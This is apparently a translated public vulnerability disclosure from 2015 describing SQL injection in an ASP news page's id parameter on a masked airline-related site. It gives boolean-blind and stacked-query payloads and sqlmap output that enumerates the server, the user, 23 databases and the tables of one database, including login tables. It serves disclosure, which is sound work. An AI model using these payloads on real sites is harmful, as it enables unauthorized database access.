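2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-12-01: Vendor chose to ignore the vulnerability; details disclosed to the public
As in the title, to keep the title looking nice... In support of the WooYun overseas edition: http://zone.wooyun.org/content/23994
Vulnerable site:
http://**.**.**.**:8089/
Vulnerable URL:
http://**.**.**.**:8089/about/news_articles.asp?id=46
The id parameter is injectable.
23 databases: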
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=49 AND 3726=3726

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=49;WAITFOR DELAY '0:0:5'--
---
[15:17:06] [INFO] testing Microsoft SQL Server
[15:17:06] [INFO] confirming Microsoft SQL Server
[15:17:06] [INFO] heuristics detected web page charset 'ascii'
[15:17:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[15:17:07] [INFO] fetching current user
[15:17:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:17:07] [INFO] retrieved: guestuser
current user: 'guestuser'
[15:18:11] [INFO] fetching current database
[15:18:11] [INFO] retrieved: nkg_Web
current database: 'nkg_Web'
[15:18:58] [INFO] testing if current user is DBA
[15:18:59] [INFO] heuristics detected web page charset 'Big5'
[15:18:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[15:18:59] [INFO] fetching database names
[15:18:59] [INFO] fetching number of databases
[15:18:59] [INFO] retrieved: 23
[15:19:17] [INFO] retrieved: cn_web
[15:20:00] [INFO] retrieved: ctu_Web
[15:20:37] [INFO] retrieved: hgh_Web
[15:21:20] [INFO] retrieved: master
[15:22:03] [INFO] retrieved: mo_web
[15:23:03] [INFO] retrieved: model
[15:24:12] [INFO] retrieved: msdb
[15:24:32] [INFO] retrieved: nkg_Web
[15:25:28] [INFO] retrieved: pek_Web
[15:26:19] [INFO] retrieved: pvg_Web
[15:27:07] [INFO] retrieved: ReportServer
[15:28:19] [INFO] retrieved: ReportServerTempDB
[15:30:09] [INFO] retrieved: s_airmacau
[15:31:01] [INFO] retrieved: szx_Web
[15:31:53] [INFO] retrieved: tempdb
[15:32:26] [INFO] retrieved: tpe_web
[15:33:21] [INFO] retrieved: tw_amh
[15:34:09] [INFO] retrieved: tw_web
[15:35:20] [INFO] retrieved: tw_web_event
[15:37:17] [INFO] retrieved: tw_web_internal
[15:39:35] [INFO] retrieved: tw_web_outstation
[15:42:37] [INFO] retrieved: tw_web_telex
[15:44:14] [INFO] retrieved: xmn_Web
available databases [23]:
[*] cn_web
[*] ctu_Web
[*] hgh_Web
[*] master
[*] mo_web
[*] model
[*] msdb
[*] nkg_Web
[*] pek_Web
[*] pvg_Web
[*] ReportServer
[*] ReportServerTempDB
[*] s_airmacau
[*] szx_Web
[*] tempdb
[*] tpe_web
[*] tw_amh
[*] tw_web
[*] tw_web_event
[*] tw_web_internal
[*] tw_web_outstation
[*] tw_web_telex
[*] xmn_Web
23 tables:
Database: nkg_Web
[23 tables]
+--------------------+
| CityName           |
| FileMapping        |
| NXPress            |
| NotesLog           |
| aboutnews          |
| dtproperties       |
| iataagent          |
| iatanewslist       |
| iatapricelist      |
| iatauser           |
| login_user         |
| newbonus           |
| news               |
| newsps_reporter    |
| newsps_user        |
| offers             |
| vinfoOrders        |
| vinfopackage       |
| vinfopackagedetail |
| vinfopackageitems  |
| vinfopackagereg    |
| vinfopackagetmp    |
| vinfouser          |
+--------------------+
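Did not dig any further.
Already demonstrated.
Filter.
Severity: No impact, ignored by vendor
Ignored at: 2015-12-01 02:51
This vulnerability appears to have been patched by the vendor; it cannot currently be verified.
None yet.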